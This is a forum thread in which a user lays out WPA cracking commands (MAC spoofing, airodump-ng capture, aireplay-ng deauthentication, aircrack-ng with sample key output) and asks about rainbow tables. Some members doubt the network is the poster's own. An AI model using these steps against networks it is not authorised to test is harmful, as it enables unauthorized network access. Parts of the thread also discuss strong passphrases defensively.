Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: BT3USB and RAINBOW TABLES for WPA cracking

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default BT3USB and RAINBOW TABLES for WPA cracking

    HI @ll
    I need the help
    I use BT3 USB and downloaded from net rainbow tables (34 GB)
    I don't know how can I use this RT which my bt3
    let that I will show the step after the step what I do

    Step 1 - Start the wireless interface in monitor mode

    ifconfig ath0 down

    wlanconfig ath0 destroy

    macchanger --another wifi0
    or
    macchanger --mac=00:11:22:33:44:55 wifi0

    wlanconfig ath0 create wlandev wifi0 wlanmode monitor

    ifconfig ath0 up

    Step 2 - Start airodump-ng to collect authentication handshake

    airodump-ng --encrypt wpa ath0

    this shows me nets

    airodump-ng -c chanel --bssid ap mac -w psk ath0

    I have the preview on the given net



    Step 3 - Use aireplay-ng to deauthenticate the wireless client

    aireplay-ng -0 0 -a ap mac -c client mac ath0
    or
    aireplay-ng -0 0 -a ap mac ath0 (no client)
    or
    I try to connect oneself to the net from second computer when aircrack-ng says "0 handshakes"


    Step 4 - Run aircrack-ng to crack the pre-shared key when I have "1 handshakes"

    AND NOW

    aircrack-ng -w password.lst -b ap mac psk*.cap

    and it was pleasantly when I forget something like this

    Aircrack-ng 0.9c


    [00:00:00] 2 keys tested (37.20 k/s)


    KEY FOUND! [ 12345678 ]


    Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

    EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


    but show the most often that he did not find the key in the dictionary.

    I used various dictionaries in many languages but the password has to be too strong

    I read on some web page that the more effective attack is when we use rainbow tables but it was not written as them to use and how can use these tables with BT3.

    If this was successful someone I ask for suggestions as to do this.

    I apologize for my English, if someone does not understand what I wrote


    my specification of the computer

    Processor:
    INTEL CORE 2 QUAD Q9550 2,83GHz (FSB 1333Mhz, 12MB L2 cache)
    Memory:
    4GB DUAL DDR2 FSB 800MHz
    Hard Drive:
    500GB SATAII , 7200rpm, 16MB chache
    Video Card:
    GEFORCE GTX280 1024MB ( 512bit )
    Wireless Network Adapter PCI:
    Atheros AR5005G



    who will bend down thanks for every one over this

    if I put the subject in the bad section I also apologize this very

  2. #2
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    8

    Default Rainbow Crack

    You might want to learn more about rainbow tables. Google for it and rainbowcrack

  3. #3
    Junior Member
    Join Date
    Dec 2008
    Posts
    69

    Default

    Quote Originally Posted by ~~Honcho View Post
    HI @ll
    I need the help
    I use BT3 USB and downloaded from net rainbow tables (34 GB)
    I don't know how can I use this RT which my bt3
    let that I will show the step after the step what I do

    Step 1 - Start the wireless interface in monitor mode

    ifconfig ath0 down

    wlanconfig ath0 destroy

    macchanger --another wifi0
    or
    macchanger --mac=00:11:22:33:44:55 wifi0

    wlanconfig ath0 create wlandev wifi0 wlanmode monitor

    ifconfig ath0 up

    Step 2 - Start airodump-ng to collect authentication handshake

    airodump-ng --encrypt wpa ath0

    this shows me nets

    airodump-ng -c chanel --bssid ap mac -w psk ath0

    I have the preview on the given net



    Step 3 - Use aireplay-ng to deauthenticate the wireless client

    aireplay-ng -0 0 -a ap mac -c client mac ath0
    or
    aireplay-ng -0 0 -a ap mac ath0 (no client)
    or
    I try to connect oneself to the net from second computer when aircrack-ng says "0 handshakes"


    Step 4 - Run aircrack-ng to crack the pre-shared key when I have "1 handshakes"

    AND NOW

    aircrack-ng -w password.lst -b ap mac psk*.cap

    and it was pleasantly when I forget something like this

    Aircrack-ng 0.9c


    [00:00:00] 2 keys tested (37.20 k/s)


    KEY FOUND! [ 12345678 ]


    Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

    EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


    but show the most often that he did not find the key in the dictionary.

    I used various dictionaries in many languages but the password has to be too strong

    I read on some web page that the more effective attack is when we use rainbow tables but it was not written as them to use and how can use these tables with BT3.

    If this was successful someone I ask for suggestions as to do this.

    I apologize for my English, if someone does not understand what I wrote


    my specification of the computer

    Processor:
    INTEL CORE 2 QUAD Q9550 2,83GHz (FSB 1333Mhz, 12MB L2 cache)
    Memory:
    4GB DUAL DDR2 FSB 800MHz
    Hard Drive:
    500GB SATAII , 7200rpm, 16MB chache
    Video Card:
    GEFORCE GTX280 1024MB ( 512bit )
    Wireless Network Adapter PCI:
    Atheros AR5005G



    who will bend down thanks for every one over this

    if I put the subject in the bad section I also apologize this very

    Hmm... I may be misinterpreting this but I get the sense that this is not your network you are trying to crack.
    First Rule of Holes: When you're in one - Stop Digging!

  4. #4
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    ohhh ok, this is my net, but I set up password such which he does not have right to be in the dictionary

    my password is on the example lkfdk3434k34kh5jkh5h5, so i think that is not crackicking possible but I wonder or if this does not have the password in the dictionary or there is the possibility that someone will break them in the different way

    the best method is to check this alone

    if I set up my pass (default) it this pass break every one

    otherwise, I praised possibilities BT to the brother, but he claims that this is shit
    he claims that if the non - standard password puts
    standard - kitchen
    non standard - k1i2t3ch4e5n6
    backtrack glad will not give to break such password because there will be no him in the dictionary

  5. #5
    Junior Member
    Join Date
    Dec 2008
    Posts
    69

    Default

    Ok.

    A dictionary by definition only contains real words so a dictionary attack against a semi-random password such as that will never succeed. However, there are 'leetspeak' dictionaries available which may contain that word. You could even generate your own by running a standard dictionary through a 'translator' program.

    At the end of the day, nothing is 'uncrackable' but that's no reason for not making it as difficult and time consuming as possible.
    First Rule of Holes: When you're in one - Stop Digging!

  6. #6

    Default

    this dude is honestly not cracking his own network...

  7. #7
    Junior Member
    Join Date
    Dec 2008
    Posts
    69

    Default

    I don't think so either but I made allowance for the fact that english is obviously not his native language. As I said in my first post I may be misinterpreting this...
    First Rule of Holes: When you're in one - Stop Digging!

  8. #8
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    Quote Originally Posted by gromeo View Post
    this dude is honestly not cracking his own network...
    hahaha you're must be really newbie
    I,m not hacker, we want only to check this protection of the net how strong is, if only you know to write such nonsense this don't write anything more please

  9. #9

    Default

    I read on some web page that the more effective attack is when we use rainbow tables but it was not written as them to use and how can use these tables with BT3.
    I believe your question is how to use rainbow tables for cracking WPA?

    If this is the question, then the answer is that rainbow tables are not for cracking WPA, they are traditionally used for cracking Microsoft NTLM password hashes.

    If you are using the term "rainbow table" incorrectly, then I apologize for the misunderstanding

    For cracking WPA, use either a large word dictionary, a pre-computed airolib-ng database or pre-computed coWPAtty tables.

    However, any of these pre-computed tables are only as good as the word-list they were created from. Using a long string of non-dictionary characters will usually suffice to keep your WPA password from being cracked.

    Use the search button on this forum, or the search engine HERE

    to find methods to create these tables.

    Good Luck...

  10. #10
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    for such answers bringing anything to the subject great thanks for you man

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •